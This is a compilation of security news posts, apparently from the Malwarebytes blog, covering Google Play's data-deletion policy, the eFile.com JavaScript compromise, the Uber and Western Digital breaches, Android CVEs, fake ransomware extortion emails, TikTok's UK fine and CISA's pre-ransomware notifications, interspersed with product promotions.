IT NEWS

Google has made multiple security improvements to the general operation of apps over the last 12 months or so. It’s now a little easier to understand what apps want from you. Labels which indicate a level of trustworthiness for developers. Changes made to ensure old, abandoned apps will no longer appear for download on the Play store.

Now the focus is on data collection, or to be more accurate, data deletion. Google wants people to be able to scrub data associated with an app. This counts for data inside of the application itself, but also out there on the web.

A farewell to app data?

Many apps require you to create an account, and very often those accounts are pinned to websites. This is particularly common with regard to video game apps, but can be a requirement for pretty much anything you choose to install depending on the developer’s needs.

From the Google announcement:

For apps that enable app account creation, developers will soon need to provide an option to initiate account and data deletion from within the app and online. This web requirement, which you will link in your Data safety form, is especially important so that a user can request account and data deletion without having to reinstall an app.

If you’re wondering, Google’s Data Safety Form is a way for developers to inform their users about how their data is used, collected, shared, and so on. All of the developer’s primary safety and privacy practices are listed here. Everything from what the developer itself does to how associated third-party entities work alongside them should be included.

Total account and data deletion

If an app user decides they no longer want anything to do with an application, there is now a way to ensure everything is gone forever. No more remnant accounts sitting around, potentially waiting to be compromised after a long period of abandonment.

From the release:

As the new policy states, when you fulfill a request to delete an account, you must also delete the data associated with that account. The feature also gives developers a way to provide more choice: users who may not want to delete their account entirely can choose to delete other data only where applicable (such as activity history, images, or videos). For developers that need to retain certain data for legitimate reasons such as security, fraud prevention, or regulatory compliance, you must clearly disclose those data retention practices.

As with so many changes of this nature, nothing is happening just yet. Developers have been given some time to get their houses in order if necessary, and submit their comments in relation to the proposed changes. They have from now until the beginning of December to do this. However, an extension is possible if needed which could give them until the end of May 2024. Either way, changes reflecting this new policy won’t kick in until somewhere around the beginning of next year.

As a device user there’s not much you can do about this for now. It’s squarely a heads up for developers to take a long look at the data they collect, and how to dispose of it when the app users feel that it’s no longer needed. Other major store owners are moving to similar policies, and this can only be a good thing for helping to reduce the threat of data theft.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The IRS-authorized electronic filing service for tax returns, eFile.com, has been caught serving a couple of malicious JavaScript (JS) files these past few weeks, according to several security researchers and corroborated by BleepingComputer. Note this security incident only concerns eFile.com, not the IRS’ e-file infrastructure and other similar-sounding domains.

As of this writing, eFile.com is clean. Users can access it without worry.

The attack began 18 days ago

The incident first arose as a possibility that something might be up with the website. A Reddit user encountered a fake “Network Error” page when accessing www.efile.com. The page, as shown below, informed visitors their browser “uses an unsupported protocol,” and that they need to click the link it provided to them to update their browser—a known tactic often used by scammers.

This fake error message used to come up when visiting the domain. Uncharacteristically, it told visitors to update their browsers. This made Redditors suspect the domain was hijacked. (Source: /u/SaltyPotter, original image cropped to fit)

This, however, is no scam.

Known figures in cybersecurity, such as MalwareHunterTeam (@malwarehunterteam) and Johannes Ullrich (@johullrich) of SANS, caught wind of the potential site compromise and dug in, with each writing their analysis.

According to both MalwareHunterTeam and Ullrich, a malformed JS file named popper.js contains encrypted malicious code—meaning it cannot be read plainly. Its purpose is to load another JS script called update.js hosted on an Amazon Web Services (AWS) site. update.js contains code used to display the fake error page.

popper.js is a legitimate file modified to do malicious tasks. Because almost every page within the eForm website loads it, the malicious activities we mentioned are triggered every time a user visits any site page.

update.js also contains two hard-coded download URLs, both served on the malicious domain infoamanewonliag[.]online. The two payloads are for two specific browsers visitors typically use, Chrome and Firefox.

“So different browsers get different payloads,” says Ullrich. Chrome users get a payload named “update.exe” with a valid signature from Sichuan Niurui Science and Technology. Firefox users get “installer.exe.” There is no indication if browsers based on Chromium (where Chrome is based) or Quantum (where Firefox is based) could also receive the payloads.

BleepingComputer has independently confirmed the payloads connect to an IP address hosted by Alibaba in China. The same IP also hosts the illicit domain the payloads were downloaded from.

These executables were written in Python. Malwarebytes detects them as Trojan.Downloader.Python.

As of Wednesday, popper.js is free of malicious code.

The backdoor

Once users execute the payload, a PHP script runs quietly in the background. BleepingComputer’s analysis shows that every 10 seconds, the backdoor script connects to a remote command and control (C2) server to receive one or more tasks to perform on the affected system. These include “executing a command and sending its output back to the attackers or downloading additional files onto the computer.”

The backdoor is unsophisticated, but it’s enough to give attackers access to the entire system, including company-owned devices.

“The full scope of this incident, including if the attack successfully infected any eFile.com visitors and customers, remains yet to be learned,” says BleepingComputer.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Uber, yet again, has become a victim of data theft following a third-party breach. This time, threat actors have aimed at the company’s law firm, Genova Burns. Data of Uber’s drivers may have been swiped during the security incident.

According to the letter sent to affected drivers, the firm became aware of “suspicious activity relating to our internal information systems” on January 31, 2023. It immediately engaged with hired experts to investigate. Data was extracted between the 23rd and the 31st. The firm also contacted Uber regarding the breach after discovering that driver data was affected.

The Register, who first reported the incident, shares the below statement from an Uber spokesperson regarding the attack against Genova Burns:

Impacted information held by Genova Burns included information of certain drivers who had completed trips in New Jersey, including social security number and/or tax identification number. These drivers have been notified that their social security number and/or tax identification number have been potentially impacted and offered complimentary credit monitoring and identity protection services.

Genova Burns indicates that they are not aware of any actual or attempted misuse of the information, and confirmed that they are taking additional steps to improve security and better protect against similar incidents in the future.

The firm also promises to take “additional steps to improve security and better help protect against similar incidents in the future.” It didn’t elaborate on those steps, however.

No Uber customer data was touched in the attack. Affected drivers, as per usual, get one year free of identity monitor services as compensation, according to The Register.

Uber is no stranger to supply chain attacks. In December, threat actors raided data from Teqtivity, a vendor that provides asset management and tracking services for the company. 77,000 Uber employee data were later on leaked.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Endpoint security has never been more important, and with the increasing complexity of the security stack, choosing the right solution can be confusing. The good news is that there is a guide available to help organizations navigate this complex landscape: the “Endpoint Security Evaluation Guide” eBook.

One of the biggest challenges in selecting an endpoint security solution is ensuring that it can protect against both existing and emerging threats, without negatively impacting system performance or causing too many false positives. This is where MRG Effitas’ independent lab assessment comes in.

Evaluating endpoint security today

MRG Effitas’ 360° Assessment & Certification evaluates endpoint security vendors against nine vital criteria for efficacy, performance, and reliability. These include blocking potentially unwanted applications, preventing exploit and post-exploitation techniques, and blocking in-house ransomware samples. Based on a product’s performance on these criteria, MRG Effitas awards four certifications: 360° Level 1, 360° Exploit, 360° Online Banking, and 360° Ransomware.

Malwarebytes is a well-known name in the endpoint security industry, and it’s no surprise that they were put to the test in MRG Effitas’ 360° Assessment & Certification. The “Endpoint Security Evaluation Guide” eBook features Malwarebytes’ results on the assessment and includes head-to-head matchups of Malwarebytes versus each participating vendor. One shining takeaway is that Malwarebytes was the only vendor to win every certification in 2022. 

Read our recap blog for the full results: https://www.malwarebytes.com/blog/business/2023/03/malwarebytes-only-vendor-to-win-every-mrg-effitas-certification-award-in-2022 

In today’s complex threat landscape, it is more important than ever to choose an endpoint security solution that can effectively protect against a wide range of threats, while minimizing false positives and system impact. The “Endpoint Security Evaluation Guide” eBook, based on MRG Effitas’ independent lab assessment, is an essential tool for any organization looking to make an informed decision about endpoint security. Download below!

GET THE ENDPOINT SECURITY EVALUATION GUIDE

In the April 2023 Android security bulletin, Google announced security updates which include fixes for two critical remote code execution (RCE) vulnerabilities and one vulnerability that has been exploited in the wild. The vulnerabilities are impacting Android systems running versions 11, 12, 12L, and 13. Users should update as soon as they can.

What needs to be done

If your Android is on security patch level 2023-04-05 or later, this will address all of these issues. Android partners are notified of all issues at least a month before publication, however this doesn’t always mean that the patches are available for devices from all vendors.

You can find your Android’s version number, security update level, and Google Play system level in your Settings app. You should get notifications when updates are available for you, but you can also check for updates.

For most phones it works like this: Under About phone or About device you can tap on Software updates to check if there are new updates available for your device, although there may be slight differences based on the brand, type, and Android version of your device.

Two critical vulnerabilities

Google never discloses a lot of details about these vulnerabilities. Access to bug details and links are usually restricted until the majority of users are updated with a fix. Here’s what we know so far:

CVE-2023-21085: A vulnerability in the System component which allows a remote attacker to execute arbitrary code. The vulnerability exists due to improper input validation within the System component. A remote attacker can trick the victim to open a specially crafted file and execute arbitrary code.

When a program is unable to perform a proper verification of input, using unintended input can influence program data flow handling. Attackers can abuse this by creating input data that can cause changes of control flow, arbitrary control of a resource, or arbitrary code execution.

CVE-2023-21096: Another vulnerability in the System component which allows a remote attacker to execute arbitrary code. The vulnerability exists due to improper input validation within the System component. A remote attacker can trick the victim to open a specially crafted file and execute arbitrary code.

One vulnerability exploited in the wild

CVE-2022-38181: A vulnerability in the Arm Mali GPU kernel driver allows unprivileged users to access freed memory because GPU memory operations are mishandled. This use-after-free (UAF) vulnerability allows a local application to escalate privileges on the system. A local application can trigger memory corruption and execute arbitrary code with elevated privileges. This vulnerability is known to be exploited in targeted attacks and was first spotted in November 2022.

UAF is a type of vulnerability that is the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code. By using dynamic memory allocated to a program with higher privileges, the attacker can use those privileges to execute his code.

We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Fake it till you make it ransomware groups are trying to get rich off the backs of genuine ransomware authors. Why are they “fake it till you make it”? Because they don’t actually create ransomware or compromise networks in any way. They’re simply lying through their teeth and hoping that recipients of their messages don’t realise until it’s too late.

As reported by Bleeping Computer, a group named Midnight has been using this tactic since at least March 16, and the organisations affected all seem to be located in the US. 

The battle plan of a fake ransomware group

The general approach is as follows:

• Claim to be a different, genuine ransomware group. If the scammers claim to be some sort of obscure (but known) affiliate or spin-off, so much the better. The target will confirm the group exists with a quick Google search, but won’t be able to do much more beyond that.
• Use a panic inducing email subject. “Notifying you about your business’s security case, we accessed your information” is one example given.
• The bigger the theft claim, the better. They talk of accessing HR records, employee records, personal and medical data. In one “attack” 600GB of data was supposedly taken from business servers.
• Targeting genuine victims by accident or design. Some businesses targeted by the fakers had indeed suffered a ransomware attack of some kind previously. Either the scare tactic mails are being blasted out to a large audience to see what comes back, or there is some deliberate targeting of organisations going on.

Nothing new, but potentially disastrous all the same

Fake mails are nothing new. 18 years of one 419 mail is as good an example as any. Send enough emails out and somewhere will fall for it eventually. The bogus ransomware extortion attempt even has a name, in the form of “Phantom Incident Scam”.

Even so, this is an area of attack where having a good response strategy for people hoping you’ll fall for a technology based lie is very effective. If your incident response consists of opening up one of these missives, panicking, and racing to pay fraudsters, it could end up being a very costly and needless mistake. Whether you’re aware of your organisation having had a genuine breach or not, someone on a chart as a point of contact for such an eventuality will come in very handy indeed.

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Western Digital, a big brand in digital storage, says it has suffered a “network security incident—potentially ransomware—which resulted in a breach and some system disruptions in its business operations.

The company identified the incident on March 26 and said an unnamed third party unlawfully accessed several computer systems to steal data. The investigation is ongoing and Western Digital has yet to learn how much was taken. 

Since the incident, Western Digital’s consumer cloud and backup service My Cloud has experienced outages, preventing customers from accessing their files. My Cloud Home, My Cloud Home Duo, My Cloud OS5, SanDisk ibi, and SanDisk Ixpand Wireless Charger all experienced service interruptions. 

Westen Digital said in its press release:

“The Company is implementing proactive measures to secure its business operations including taking systems and services offline and will continue taking additional steps as appropriate. As part of its remediation efforts, Western Digital is actively working to restore impacted infrastructure and services. Based on the investigation to date, the Company believes the unauthorized party obtained certain data from its systems and is working to understand the nature and scope of that data.”

Western Digital is a billion-dollar company, making it a target for criminals aiming to cash in. In the first quarter of 2023 alone, it received a revenue of $3.1B.

We’ll update this story as we learn more.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

TikTok has been ordered to pay a fine of $15.6M (£12.7M) for failing to protect 1.4 million UK children under the age of 13 from accessing its platform in 2020. The Information Commissioner’s Office (ICO), the UK’s data protection watchdog, imposed the fine after finding the company used children’s data without parental consent.

According to the ICO, the company may have used the data for tracking and profiling purposes. It may have also presented children with content deemed potentially harmful or inappropriate.

“There are laws in place to make sure our children are as safe in the digital world as they are in the physical world. TikTok did not abide by those laws,” said John Edwards, information commissioner for the ICO.

“TikTok should have known better. TikTok should have done better.”

Edwards told BBC News that TikTok had “taken no steps” to get parents’ consent.

“If you’ve been looking at content which is not appropriate for your age, that can get more and more extreme. It can be quite harmful for people who are not old enough to fully appreciate the implications and to make appropriate choices.”

In an interview with the BBC, Prof Sonia Livingstone, a researcher who studies children’s digital rights and experiences at the London School of Economics and Political Science, said she was happy the ICO had taken action against TikTok but fears the fine could be “shrugged off as the cost of doing business,” implying that nothing much might change with how TikTok operates.

“Let’s hope TikTok reviews its practices thoroughly and make sure that it respects children’s privacy and safety proactively in the future,” she said.

A TikTok spokesperson said the company invests “heavily to help keep under 13s off the platform and our 40,000-strong safety team works around the clock to help keep the platform safe for our community.”

“We will continue to review the decision and are considering next steps,” the spokesperson added.

The ICO gave TikTok 28 days to appeal the fine.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The channel, comprising managed service providers (MSPs), Systems Integrators (SIs), value-added resellers (VARs), and more, plays a vital role in providing cybersecurity for companies around the globe today. But as malware evolves and cyberattacks become more common, keeping up with the top threats to the channel can be difficult.

With a plethora of cyberthreats out there, which ones should channel partners focus on in 2023?

Malwarebytes addresses this question in the 2023 State of Malware Report, identifying the five most potentially damaging malware threats that MSPs, SIs, VARs, including their clients, should prioritize.

Key channel threats in the 2023 State of Malware Report

One example of threats the channel should prepare for is the email-borne Emotet Trojan, a notorious threat that continues to plague businesses. The report also highlights the growing issue of ransomware attacks, 39% of which target service providers according to Kaseya’s 2022 MSP Benchmark Survey.

A particular focus is on the ransomware group LockBit, which was responsible for the majority of ransomware attacks in 2022. In February 2023 alone, the group published 126 victims on its leak page. LockBit affects companies of all sizes, from hospitals to small and large businesses.

Our report serves as a valuable resource for channel partners, helping them optimize defense strategies and take both proactive and reactive measures in the fight against the most damaging malware threats of the year. By using the insights from the report, the channel can better protect their own organizations as well as their customers’.

The role of channel partners in cybersecurity

The channel is pivotal to helping their clients adapt to the ever-changing threat landscape and avoid falling victim to devastating cyberattacks. As channel partners make their way into 2023, they can stay ahead of the curve by keeping these tips in mind:

• Prioritize the top five malware threats identified in the Malwarebytes report and implement targeted defense strategies to protect clients against these risks.
• Read our Threat Intelligence blog to keep informed about the latest cyberthreats, such as the activities of ransomware groups like LockBit, to ensure your clients are prepared for emerging risks.
• Educate your clients about the evolving threat landscape and help them develop a culture of security awareness within their organizations.
• Continuously evaluate and optimize your security offerings to ensure they meet the needs of your clients and protect against the latest threats.

Channel partners are uniquely positioned to guide companies through the complex cybersecurity landscape. As trusted advisors, they play a crucial role in educating businesses about the latest threats, providing tailored security solutions, and ensuring that their clients—and themselves—can continue to operate securely and efficiently. Read the full report below to learn more.

Get the full 2023 State of Malware report for the channel

CISA (Cybersecurity and Infrastructure Security Agency) has published the first results of its pre-ransomware notifications that were introduced at the start of 2023.

Even though this initiative is relatively young, CISA says it has notified over 60 entities across the energy, healthcare, water/wastewater, education, and other sectors about potential pre-ransomware intrusions, and we’ve confirmed that many of them identified and remediated the intrusion before encryption or data loss occurred.

In order to develop the pre-ransomware notifications, CISA established the Joint Cyber Defense Collaborative (JCDC) to “unify cyber defenders from organizations worldwide”. The team proactively gathers, analyzes, and shares actionable cyber risk information.

The success of the operation relies on a few key factors:

• Sharing intelligence by the cybersecurity research community, infrastructure providers, and cyber threat intelligence companies about potential early-stage ransomware activity.
• Getting that information to the victim organization and providing specific guidance about containing the threat.
• The time cybercriminals take from the initial security breach to the full-fledged ransomware attack.

Basically, the more information organizations give about early-stage ransomware activity, the better the information the JCDC can provide. This information also helps to keep lists like the known to be exploited vulnerabilities catalog up to date and helps create ransomware vulnerability warnings which inform organizations that a vulnerability used by ransomware threat actors is present on their network.

But how do pre-ransomware notifications work in real life?

Let’s take the fake IRS mail we reported about last week as an example. My colleagues found an email being sent out with the title of “IRS Tax Forms W-9” which appears to have been sent from “IRS Online Center”. In reality, the attachment contains a malicious macro. Enabling the content of the attachment will result in Emotet being downloaded onto the system.

The JCDC can in turn share this information with potential victims. “Have you seen this mail? Did anyone open the attachment? Did they use the “Enable Content” button? Here is what you can do to prevent your systems from getting encrypted. These are the tactics, techniques, and procedures (TTPs) and Indicators of Compromise (IOCs) you need to look for. And this call-to-action can be pretty specific because they know that any potential victims should be looking for Emotet.

For many non-profit organizations that can’t afford their own security team or an external Managed Detection and Response (MDR) service, this is very helpful and, as CISA concludes, has proven its usefulness. While the pre-ransomware notifications service is aimed at US organizations, JCDC works with international Computer Emergency Readiness Team (CERT) partners to enable a timely notification when it concerns a company outside the US.

The more information we share, the better the information JCDC can provide gets. Any organization or individual with information about early-stage ransomware activity is urged to contact Report@cisa.dhs.gov. If your organization is interested in participating in these collaborative efforts to stop ransomware, please visit cisa.gov/JCDC-faqs or email cisa.jcdc@cisa.dhs.gov.

Every US ransomware incident should be reported to the US government. You can find information on reporting at stopransomware.gov.

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW